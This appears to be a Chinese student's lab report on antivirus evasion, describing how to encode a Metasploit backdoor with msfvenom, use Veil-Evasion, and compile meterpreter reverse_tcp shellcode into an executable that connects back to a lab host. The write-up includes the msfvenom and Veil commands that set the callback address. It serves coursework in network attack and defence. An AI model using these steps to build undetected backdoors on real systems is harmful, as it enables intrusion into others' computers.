20155334 曹翔 Exp3 免杀原理与实践
20155334 曹翔 Exp3 免杀原理与实践
小记:这次实验,困难重重,失败练练,搞得我们是心急如焚,焦头烂额,哭爹喊娘
一、基础问题回答
杀软是如何检测出恶意代码的?
每个杀软都有自己的检测库,每种代码都有属于自己的的特征码,杀软将代码的特征码与检测库中的比对,若有相符的则识别为恶意代码。此外检测该代码的行为,若有恶意行为则判断为恶意代码。免杀是做什么的?
使用各种手段使得恶意代码和杀软共从于电脑中。免杀的基本方法有哪些?
(1)改变特征码、加壳、进行异或、逆序、改变软件的行为等手段;
(2)使用隧道技术。
二、 实验步骤
裸奔,利用之前实验中msf生成后门程序进行:
结果:


该后门表示,宝宝也hin委屈,裸奔能不被抓么?
2.Msfvenom使用编码器生成可执行文件
(1)一次编码,生成文件命名为5334bdoor.exe

结果:


(2)多次编码,生成文件命名为5334bdoor1.exe

结果:


Veil-Evasion
这个veil,是我用过最难用的软件了,没有之一,别的软件难用在于不懂怎样操作,她的难点在于安装不上,尽力过三天的反复安装,我决定用老师的了。命令 作用 use c/meterpreter/rev_tcp.py 设置payload set LHOST 192.168.1.113 设置反弹IP set LPORT 5334 设置反弹端口5334 generate 生成 之前使用的是
python,可惜都没有exe可执行文件。通过参考同学的博客,改用c语言生成,终于有了效果。生成的文件命名为34bdoor.exe

拷贝到主机上,并通过网站扫描:

很遗憾,依旧被拦截。
调用Shellcode
换一种方式接着来:
在kali中进入终端,命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5334 -f c
生成数组如下:

将上边的数组copy进编写的C语言文件,并编译。
很好,我的codeblock编译不了,这时候我是异常的开心,呵~呵~
又经过同学博客的指点,我在win7的虚拟机上升级了SP1版本,安装了net framework4.5、Visual Studio2017耗时+1天,嘿嘿,贼开心,开心到快疯了。
使用Visual Studio2017编译,名称为Project1:

得到EXE文件:

电脑主机说:“向我开炮!!”
于是:


“你还是太嫩,哼。”
回连


三、实践总结与体会
只能说这次的实验被veil连累太久,不过好在都解决了。再此谢谢老师和各位同学的帮助。
这次实验让我看到了,有了杀软的电脑并不是绝对安全的,他只是为我们提供一份保障,让我们普通人的网络能够正常的运行,不会在因为一个简简单单的小代码而破坏生活。
另外,这也让我更加明白了为啥涉密电脑必须不能连接网络的原因了。
20155334 曹翔 Exp3 免杀原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...
- 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...
- 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...
- 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
- 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
- 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践 一.实验说明 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),vei ...
随机推荐
- JSP隐含对象
1.out隐含对象 (输出对象) 直接用于在JSP页面输出内容 javax.servlet.jsp.JspWriter(抽象类) 继承自java.io.Writer JSP中的out对象最终被转化成s ...
- HTML5详解
本文最初发表于博客园,并在GitHub上持续更新前端的系列文章.欢迎在GitHub上关注我,一起入门和进阶前端. 以下是正文. HTML5的介绍 Web 技术发展时间线 1991 HTML 1994 ...
- 基于MSMQ绑定的WCF服务实现总结
一. 创建消息队列 1 1) 创建一个非事物性的私有队列 1 2)设置消息队列访问权限 2 二.创建WCF服务并绑定消息队列 4 1)创建HelloService服务 4 ...
- Sqlserver数据库中的临时表详解
临时表在Sqlserver数据库中,是非常重要的,下面就详细介绍SQL数据库中临时表的特点及其使用,仅供参考. 临时表与永久表相似,但临时表存储在tempdb中,当不再使用时会自动删除.临时表有两种类 ...
- CentOS配置rsyslog Serve
CentOS6配置rsyslog Server: vi /etc/rsyslog.conf: #启用如下tcp支持: $ModLoad imtcp $InputTCPServerRun 514 #添加 ...
- python基础学习1
一.python第一个程序 print("hello world") 二.变量的命名规则 1. 字母数字下划线组成 2. 不能以数字开头,不能含有特殊字符和空格 3. 不能以保留字 ...
- django中url 和 path 的区别
django中 url 和 path 都是配置路径,有什么不同? django.urls path django.conf.urls url path 与 url 是两个不同的模块,效果都是响应返回 ...
- 彻底理解lib和dll
转自:http://www.cppblog.com/amazon/archive/2009/09/04/95318.html 两种库:一种是LIB包含了函数所在的DLL文件和文件中函数位置的信息(入口 ...
- Fix_And_Hold 使用及存在问题
RTKLIB中使用FIXANDHOLD没有对各个卫星的方差进行排序,仅仅是使用了截止高度角.而大软件中进行了排序后,使用30°的截止角作为hold条件. 1.总卫星数与hold卫星数,及ratio,全 ...
- 详解动态规划(Dynamic Programming)& 背包问题
详解动态规划(Dynamic Programming)& 背包问题 引入 有序号为1~n这n项工作,每项工作在Si时间开始,在Ti时间结束.对于每项工作都可以选择参加与否.如果选择了参与,那么 ...